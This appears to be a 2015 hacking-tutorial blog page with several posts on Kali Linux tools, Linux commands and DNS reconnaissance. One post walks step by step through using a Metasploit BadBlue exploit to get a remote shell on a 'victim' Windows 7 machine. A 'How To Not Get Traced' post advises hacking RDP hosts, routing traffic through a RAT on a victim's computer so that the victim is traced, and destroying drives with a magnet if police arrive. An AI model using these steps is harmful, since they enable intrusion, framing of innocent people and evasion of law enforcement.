Sunday, 14 June 2015

Managing Kali Linux Services

Kali  Linux  is  a  specialized  Linux  distribution  aimed  at  security  professionals. As  such,  it  contains  several  non-­‐‐standard  features.  The  default  Kali  installation  ships  with  several services  preinstalled,  such  as  SSH,  HTTP,  MySQL,  etc.  If  left  untouched,  these  services  would  load  at  boot  time,  which  would  result  in  Kali  Linux  exposing  several  open  ports  by  default  –  something  we  want  to  avoid,  for  security  reasons.  Kali  deals  with  this  issue  by  updating  our  settings  to  prevent  network  services  from  starting  at  boot  time. 
   
     The following module will discuss some of these services, as well as how to operate and manage them.

Default root Password:- 

         If you installed Kali from an image file, the installation process should  have prompted you for a root password. If you are using the Kali Linux   VMware image, as recommended, the default root password is   "toor".   Make sure to change any default or weak passwords to something long,   complex, and secure before starting any services such as SSH. The root  password can be changed with the passwd command as shown below. 




SSH Service:- 

           The Secure Shell (SSH)3 service is most commonly used to  remotely access a computer, using a secure, encrypted protocol. However, as we will see later on  in the course, the SSH protocol has some surprising and useful features, beyond providing terminal access. The SSH service is TCP-­based and listens by default on port 22. To start the SSH service in Kali, type the following command into a Kali terminal.
       We can verify that the SSH service is running and listening on TCP port 22 by using the netstat command and piping the output into the grep command  to search the output for sshd.



          If, like many users, you want to have the SSH service start automatically at boot time, you need to enable it using the update-­rc.d script as follows. The  update-­rc.d script can be used to enable and disable most services within Kali Linux.



HTTP Service:-

          The HTTP service can come in handy during a penetration test,  either for hosting a site, or providing a platform for downloading files to a victim machine. The  HTTP service is TCP-­based and listens by default on port 80. To start  the HTTP service in Kali, type the following command into a terminal.




             As we did with the SSH service, we can verify that the HTTP  service is running and listening on TCP port 80 by using the netstat and grep commands once again.



             To have the HTTP service start at boot time, much like with  the SSH service, you need to explicitly enable it with update-­rc.d  




Posted by at No comments:

Saturday, 13 June 2015

How to Hack Window 7 using badblue exploit

Introduction of BadBlue :-


                        Basically it  used for file sharing many organization use this software for file sharing
& hacker can take advanctage of it how ?? lets see.....


 Steps:-

1. Fire the metasploit framework by using "msfconsole" in terminal.



2. Type "search badblue" in msf framework and hit enter.


3.    Now type "use exploit/windows/http/badblue_passthru" and hit enter.


4.  Set the required arguments for the exploit for this type "show options" it will give required argument we want to set.

5.  Type "set rhost  <ip_address of victim>" hit enter.

6.  Now final type "exploit" to exploit our victim remotely.


7.    When you get the meterpreter session it means you are in the victim system for check type "sysinfo" to see information about our victim. and type "shell" to interact with victim's cmd.


Posted by at No comments:

Friday, 5 June 2015

Load Balancing Detector (lbd) in Kali Linux

Introduction


Load Balancing Detector (lbd) is a tool which checks, if a given domain use load balancing or not. This tool is mainly used by pentesters and hackers to checks site is dosable or not.

Objectives

In this tutorial we will learn how to use Load Balancing Detector (lbd).

Procedure

How to open it :-

Open lbd  through Kali Linux >> Information Gathering >> IDS IPS Identification
 >>  lbd



How to use it :-


·      To use it, you have to use this command usage: /usr/bin/lbd [domain]
·      This tool will first scans for DNS-Load Balancing and then HTTP-Load Balancing.
·      Atlast, it will show the result.




Posted by at No comments:

Firewall Detection Tool Wafw00f in Kali Linux

Introduction

This is a Web Application Firewall Detection Tool.
The tool was written by – Sandro Gauci And G. Henrique.

It will help you detect the WAF ( Web Application Firewall )  behind the any domain.
Wiffit (Wafw00f ) can test for these Firewalls listed in the image -
If any firewall is detected from the list it will display on-screen

How Wiffit (Wafw00f) detects Web Application Firewall (WAF)
To detect WAF it looks for the following things :
  • Cookies
  • ServerCloaking
  • Response Codes
  • Drop Action
  • Pre Built-In Rules

How to Open Wiffit On Kali Linux

Applications > Kali Linux > Information Gathering > IDS/IPS Identification > wafw00f

wafw00f is open now , see the below image for more details -



How to use wafw00f

Example 1 :
Usage :
  1. root@root :
wafw00f [ target url ]
  1. Example :
wafw00f www.***.com
  1. This example shows that www.***.com is behind the Web Application Firewall.



Posted by at No comments:

Thursday, 4 June 2015

Useful Commands in Linux

A comprehensive list of commands needed when using Linux:

Command privileges.

    sudo command - run command as root
    sudo su – root shell open
    sudo su user – open shell as a user
    sudo -k – forget your password sudo
    gksudo command – sudo visual dialog (GNOME)
    kdesudo command – sudo visual dialog (KDE)
    sudo visudo – edit / etc / sudoers
    gksudo nautilus – root file manager (GNOME)
    kdesudo konqueror – root file manager (KDE)
    passwd – change your password 

Command Network

    ifconfig – displays information network
    iwconfig – displays information from wireless
    sudo iwlist scan – scan wireless networks
    sudo /etc/init.d/networking restart – reset the network
    (file) /etc/network/interfaces – manual configuration
    ifup interface – bring online interface
    ifdown interface – disable interface 

Commands Display

    sudo /etc/init.d/gdm restart – reset X (Gnome)
    sudo /etc/init.d/kdm restart – reset X (KDE)
    (file) /etc/X11/xorg.conf – show Configuration
    sudo dpkg-reconfigure - reconfigure xserver-xorg-phigh - reset configuration X
    Ctrl+Alt+Bksp – X display reset if frozen
    Ctrl+Alt+FN – switch to tty N
    Ctrl+Alt+F7 – switch back to X display 

Commands Service System.

    start service – service to start work (Upstart)
    stop service – service to stop working (Upstart)
    status service – check if service is running (Upstart)
    /etc/init.d/service start – start service (SysV)
    /etc/init.d/service stop – stop service (SysV)
    /etc/init.d/service status – check service (SysV)
    /etc/init.d/service restart – reset service (SysV)
    runlevel – get current runlevel 

Commands for Firewall.

    ufw enable – turn on the firewall
    ufw disable – turn off the firewall
    ufw default allow – allow all connections by default
    ufw default deny – drop all connections by default
    ufw status – current rules and
    ufw allow port – to allow traffic on port
    ufw deny port – port block
    ufw deny from ip – ip block 

Command System.

    lsb_release -a – get the version of Ubuntu
    uname -r – get kernel version
    uname -a – get all the information kernel 

Commands for Package Manager.

    apt-get update – refresh updates available
    apt-get upgrade – update all packages
    apt-get dist-upgrade – version update
    apt-get install pkg – installing pkg
    apt-get remove pkg – uninstall pkg
    apt-get autoremove – removing packages obsotletos
    apt-get -f install – try to fix packages
    dpkg –configure -a – try to fix a broken package
    dpkg -i pkg.deb – install file pkg.deb
    (file) /etc/apt/sources.list – list of repositories APT 

Special Packages For commands.

    ubuntu-desktop – Setting the standard Ubuntu
    kubuntu-desktop – KDE Desktop
    xubuntu-desktop – desktop XFCE
    ubuntu-minimal – core earnings Ubuntu
    ubuntu-standard – the standard utilities Ubuntu
    ubuntu-restricted-extras – not free, but useful
    kubuntu-restricted-extras – ditto KDE
    xubuntu-restricted-extras – ditto XFCE
    build-essential – packages used to compile
    linux-image-generic – latest generic kernel image
    linux-headers-generic – latest headlines 

Applications commands.

    nautilus – File Manager (GNOME)
    dolphin – File Manager (KDE)
    konqueror – Web browser (KDE)
    kate – text editor (KDE)
    gedit – text editor (GNOME)
Posted by at No comments:

How To Not Get Traced


First you are going to want to know what you need, right?

VPN

PuTTY

Tor

RDP

Proxy

RAT

SMAC

TrueCrypt

Magnet


---------------------------------------------------------------------------

First you want to buy a VPN, free VPNs are always shitty and raped
by the NSA. I sugget Private Internet Access as a good VPN,
They have no logs, offshore location and private IPs.
If you want to cut a little bit by about $2 go a head and buy nVPN.

These are VPNs that use the OpenVPN protocol so you are going to
have to need OpenVPN.

You will need to use a VPN whilst on skype or you will be easily doxed.

---------------------------------------------------------------------------

PuTTY is essential for setting up a SSH/VPS network. If someone DDoS's your
VPN you can fall back to you SSH/VPS untill your VPN comes back up.
SSH is also a good layer to your chain (will speak about soon)

---------------------------------------------------------------------------

Tor Browser is a brilliant browser that is designed to stop internet spying.
Tor has 3 Nodes, Entry Node, Middle Node and the Exit node which are good
layers to your chain.
These nodes act as 3 different IPs that help reinfource your anonymity.

----------------------------------------------------------------------
-----
A RDP (Remote Desktop Protocol) works like a SOCKS5 Proxy, it is hosted
by another computer network. There are many free RDP's but some cost money,
You can easily hack RDPs. This is also a vital layer to your chain.

---------------------------------------------------------------------------

A proxy is similar to a VPN but a VPN encrypts all network access, A proxy
will only encrypt your browser network. You can set up as many proxies as
you want by using a open source tool called 'Proxifier'

I have my own project coming along called SkypeGhost, Which is a skype
configuration file which acts as a proxy of your choice. (Out soon!)

---------------------------------------------------------------------------

You will need a RAT for its Reverse Socks5 feature, this enables your current
IP to be you victims IP and you will be Doxed/Traced to him.
Most RATs have this feature, If you dont want to set up portwarding you need
to use a PHP Rat.

---------------------------------------------------------------------------

SMAC is a tool like a VPN but for your MAC address, it works too spoof your
MAC address making it harder to trace you. Their are other alternatives
to SMAC but I think this is the best for me.

---------------------------------------------------------------------------

TrueCrypt is a tool for encrypting your hard drive from pentesters,
you can choose which HDD's to encrypt as you go!

---------------------------------------------------------------------------

A Magnet is used for rolling along your HDD if the cops come to
destroy the drive.

---------------------------------------------------------------------------

Your chain should look like this;

RDP>>VPS/SSH>>VPN>>Reverse SOCS5>>Your Proxy Chain>>Tor Entry Node>>
Tor Middle Node>> Tor Exit Node
Posted by at No comments:

Information Gathering With dnsrecon Kali Linux


DNSRecon is a tool for enumeration, coded in python.
DNSRecon provides the ability to perform:
  • Check all NS Records for Zone Transfers
  • Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  • Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
  • Check for Wildcard Resolution
  • Brute Force subdomain and host A and AAAA records given a domain and a wordlist
  • Perform a PTR Record lookup for a given IP Range or CIDR
  • Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
  • Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google
So Lets begin:-
      
                                     Open dnsrecon through Kali Linux >> Information Gathering >>  Dns Analysis >> dnsrecon




For std, type: dnsrecon -t std -d youtube.com



For SRV type : dnsrecon -t srv -d gmail.com



 For axfr, type:-dnsrecon -t axfr -d saintangelos.com



 For tld, type: dnsrecon -t tld -d saintangelos.com



Posted by at No comments:
Subscribe to: Posts (Atom)